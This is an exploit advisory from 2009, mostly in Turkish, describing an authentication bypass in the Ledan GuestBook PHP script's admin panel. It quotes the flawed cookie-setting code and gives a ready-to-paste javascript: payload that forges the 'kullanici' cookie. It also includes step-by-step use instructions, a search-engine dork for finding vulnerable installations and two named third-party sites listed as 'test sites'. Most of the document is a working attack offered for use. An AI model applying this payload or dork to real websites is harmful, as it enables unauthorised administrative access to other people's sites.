Ledan GuestBook Admin Panel Login Bypass Vulnerability

November 12, 2009 yazan FreWaL

Güvenlik açığı http://securityreason.com/exploitalert/7440 Securityreason tarafından onaylandı Turk bir script olduğu için sizlerede bildirme gereği duydum . İyi günler

Açık ile Admin paneli çok rahat bi şekilde bypass edilebiliyor ve admin paneline giriş yapılabiliyor. Yapmanır gerek sayfayı açtıktan sonra exploiti yapıştırıp enterlemek ardından geri giderek index.php yolunu açmak .

# Vulnerable Code in yoneticigiris.php :
#
# else {
# $kontrol_ok = mysql_fetch_array($kontrol);
# setcookie ("kullanici", "$kontrol_ok[kullaniciadi]");
# header ("Location: index.php");
#
# Only needed valid username
# Example Cookie : kullanici=admin
# admin is our username

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Ledan GuestBook Admin Panel Login By Pass

[+] Download : http://demo.ledan.net/

[+] Link : http://demo.ledan.net/download/ledan.zip

[+] Found by : FreWaL [Turkey]

[+] Contact : frewal@frewal.net
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
[+]Coding error was made : yoneticigiris.php online : 30 - 32

[+] Dork : inurl:admin/giris.php

[+] Admin Panel : [site]/admin/giris.php

[+] Demo : http://defter.ledan.net/admin/

[+] Exploit : javascript:document.cookie = "kullanici=[kullanici];
path=/";

[+] Go WebPage and exploit code paste browser ' Enter '. Go back
http://[site]/admin/index.php

[-] Test Sites 1 : http://www.aic.gen.tr/zdefter/admin/giris.php

[-] Test Sites 2 : http://belcarsak.com/ziyaret/lzd/admin/giris.php

Special thanks All My Friends
=======================================================

Permalink